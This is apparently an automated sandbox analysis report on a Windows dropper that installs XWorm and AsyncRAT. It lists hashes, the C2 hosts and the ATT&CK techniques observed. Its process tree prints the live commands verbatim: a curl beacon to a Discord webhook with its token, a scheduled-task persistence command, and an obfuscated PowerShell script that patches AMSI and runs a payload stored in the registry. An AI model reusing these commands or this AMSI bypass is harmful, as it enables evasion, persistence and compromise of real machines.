Analysis

  • max time kernel
    5s
  • max time network
    7s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-06-2024 05:28

Errors

Reason
Machine shutdown

General

  • Target

    Dropper.exe

  • Size

    1.4MB

  • MD5

    afbd173e05ef8ddabbe10b90f93b6614

  • SHA1

    718220c153e1eba3d978eb7d2eb884716797be9f

  • SHA256

    9d89f838ab73933fc7a35b409e022dbb33e11c94c306ecfe9710e8ed3a82946e

  • SHA512

    5d4f4dcbdf4acbdd84c3da5a8351ff5db0c5091dcb94eb6dfb7b019e0ba342bf74e0bd3eb5b4484e6247561e7325be90e8433ee42137e6cf56fc1d76f29eb31f

  • SSDEEP

    12288:C0w1hc0h3LOAGkjwtBx5n4AYakafNh/ymPj/YDLm7GylDULvEd8oK/mngAmgIv:CCmwDRPjwuB

Malware Config

Extracted

Family

xworm

C2

politics-fiber.gl.at.ply.gg:47430

Attributes
  • Install_directory

    %AppData%

  • install_file

    $77-scchost.exe

Extracted

Family

asyncrat

Botnet

Default

C2

environmental-blank.gl.at.ply.gg:25944

Attributes
  • delay

    1

  • install

    true

  • install_file

    $77-aachost.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Async RAT payload 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 41 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Dropper.exe
    "C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2144
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1488
      • C:\Windows\SysWOW64\curl.exe
        curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
        3⤵
          PID:540
      • C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
        "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:3320
      • C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
        "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4984
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4028
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4196
      • C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
        "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:756
      • C:\Users\Admin\AppData\Local\Temp\$77-install.exe
        "C:\Users\Admin\AppData\Local\Temp\$77-install.exe"
        2⤵
        • Executes dropped EXE
        PID:1724
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:cGMeUGbQwrUv{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XodSWkjyDnBiia,[Parameter(Position=1)][Type]$PAOuipoSxq)$aTHgdegoXPd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+''+[Char](108)+'ect'+[Char](101)+'dD'+'e'+''+[Char](108)+'e'+'g'+''+[Char](97)+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+'y'+''+'M'+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+'t'+'e'+[Char](84)+''+[Char](121)+''+[Char](112)+'e','C'+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+'Sea'+'l'+''+'e'+'d'+[Char](44)+'A'+'n'+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+'C'+''+'l'+'a'+'s'+'s',[MulticastDelegate]);$aTHgdegoXPd.DefineConstructor('RTS'+[Char](112)+'e'+[Char](99)+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+'H'+''+[Char](105)+'d'+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+','+'P'+''+'u'+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$XodSWkjyDnBiia).SetImplementationFlags(''+[Char](82)+'un'+'t'+''+'i'+''+[Char](109)+'e'+','+''+[Char](77)+''+'a'+'na'+[Char](103)+'e'+[Char](100)+'');$aTHgdegoXPd.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+'k'+'e'+'',''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+''+'c'+','+[Char](72)+''+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+'a'+''+[Char](108)+'',$PAOuipoSxq,$XodSWkjyDnBiia).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $aTHgdegoXPd.CreateType();}$yyojQTtxCfSnI=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+'.dl'+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+'ro'+'s'+''+[Char](111)+''+[Char](102)+'t'+[Char](46)+'W'+[Char](105)+'n'+'3'+''+'2'+''+[Char](46)+'U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+''+'a'+''+[Char](116)+'i'+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'hod'+'s'+'');$mrTAGOxMImyDmj=$yyojQTtxCfSnI.GetMethod(''+[Char](71)+'et'+'P'+''+[Char](114)+''+[Char](111)+''+'c'+'A'+[Char](100)+'d'+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+'c'+','+''+'S'+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JaCeBBsAfsErqPBefOq=cGMeUGbQwrUv @([String])([IntPtr]);$UiEkmYxvdURwPmuJIbXHnK=cGMeUGbQwrUv @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$eMjwxkfWWoA=$yyojQTtxCfSnI.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+''+'o'+''+[Char](100)+'ul'+[Char](101)+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object]('kern'+[Char](101)+''+'l'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$linFdlzdfFGtts=$mrTAGOxMImyDmj.Invoke($Null,@([Object]$eMjwxkfWWoA,[Object](''+[Char](76)+''+'o'+''+[Char](97)+'d'+'L'+''+[Char](105)+''+'b'+''+[Char](114)+''+'a'+'ryA')));$MLgpJhmpOvyryFfje=$mrTAGOxMImyDmj.Invoke($Null,@([Object]$eMjwxkfWWoA,[Object]('V'+[Char](105)+'r'+'t'+''+[Char](117)+'al'+'P'+'r'+[Char](111)+'te'+'c'+'t')));$SzYSnFW=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($linFdlzdfFGtts,$JaCeBBsAfsErqPBefOq).Invoke('a'+[Char](109)+'s'+[Char](105)+''+'.'+''+[Char](100)+'l'+[Char](108)+'');$igBeVBuvnHTmziqrM=$mrTAGOxMImyDmj.Invoke($Null,@([Object]$SzYSnFW,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+[Char](66)+''+'u'+''+'f'+'f'+'e'+'r')));$COqrNkTiDi=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MLgpJhmpOvyryFfje,$UiEkmYxvdURwPmuJIbXHnK).Invoke($igBeVBuvnHTmziqrM,[uint32]8,4,[ref]$COqrNkTiDi);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$igBeVBuvnHTmziqrM,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MLgpJhmpOvyryFfje,$UiEkmYxvdURwPmuJIbXHnK).Invoke($igBeVBuvnHTmziqrM,[uint32]8,0x20,[ref]$COqrNkTiDi);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$7'+[Char](55)+''+[Char](115)+''+'t'+''+[Char](97)+''+'g'+'er')).EntryPoint.Invoke($Null,$Null)"
      1⤵
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4528

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Execution

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Persistence

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Privilege Escalation

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Command and Control

    Web Service

    1
    T1102

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
      Filesize

      66KB

      MD5

      499861c56b2368cb123c027336370b92

      SHA1

      c018376876cc5906681502bdc4c313e9ce4bd6ad

      SHA256

      146a6db11db984e114e8942aa9a684f3c33c8348029cc1406754f134adbb3930

      SHA512

      c585a7e0cf0c860863699a13ae6843babbf13b13246715e9ae5ba8296b4037ee839c09b3648250c6a3687ee01e2ad5a65ebc77aabd42bd3ad7398d6b57f9e077

    • C:\Users\Admin\AppData\Local\Temp\$77-install.exe
      Filesize

      163KB

      MD5

      1a7d1b5d24ba30c4d3d5502295ab5e89

      SHA1

      2d5e69cf335605ba0a61f0bbecbea6fc06a42563

      SHA256

      b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5

      SHA512

      859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

    • C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
      Filesize

      256KB

      MD5

      18f497deffe88b6b2cff336a277aface

      SHA1

      4e1413241d3d3e4dbff399d179f8fd64f3ecd39e

      SHA256

      8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5

      SHA512

      35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d

    • C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
      Filesize

      50KB

      MD5

      77a71f3a441aa3bf824967e52413bec5

      SHA1

      c3d6df5cfc5eefaadf9bcb3703484e3cadf79588

      SHA256

      1e6c87e492d90fbc4b9d2a16676a58735e33861f780c6c3020869337a0ccfc82

      SHA512

      31c413cb410b366b63f0e763e288c2795584f9c7fda41eeea45f7d32a853da87e3ab58a144ff02a75b1d1803c7fef9fe3d561133a50a4e600799ed6f9050fd5b

    • C:\Windows\Temp\__PSScriptPolicyTest_g3hgnhhh.oug.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/756-188-0x0000000000F50000-0x0000000000F96000-memory.dmp
      Filesize

      280KB

    • memory/756-216-0x0000000002EF0000-0x0000000002EF6000-memory.dmp
      Filesize

      24KB

    • memory/2144-1-0x0000000000480000-0x00000000005F0000-memory.dmp
      Filesize

      1.4MB

    • memory/2144-0-0x00000000744DE000-0x00000000744DF000-memory.dmp
      Filesize

      4KB

    • memory/3320-65-0x0000000000A80000-0x0000000000A92000-memory.dmp
      Filesize

      72KB

    • memory/3320-64-0x00007FFFFA653000-0x00007FFFFA655000-memory.dmp
      Filesize

      8KB

    • memory/4528-222-0x000001F4B48E0000-0x000001F4B4902000-memory.dmp
      Filesize

      136KB

    • memory/4528-231-0x000001F4B4C80000-0x000001F4B4CAA000-memory.dmp
      Filesize

      168KB

    • memory/4528-232-0x00007FF8195D0000-0x00007FF8197C5000-memory.dmp
      Filesize

      2.0MB

    • memory/4528-233-0x00007FF819190000-0x00007FF81924E000-memory.dmp
      Filesize

      760KB

    • memory/4528-234-0x00007FF643530000-0x00007FF6435A1000-memory.dmp
      Filesize

      452KB

    • memory/4984-127-0x0000000000600000-0x0000000000616000-memory.dmp
      Filesize

      88KB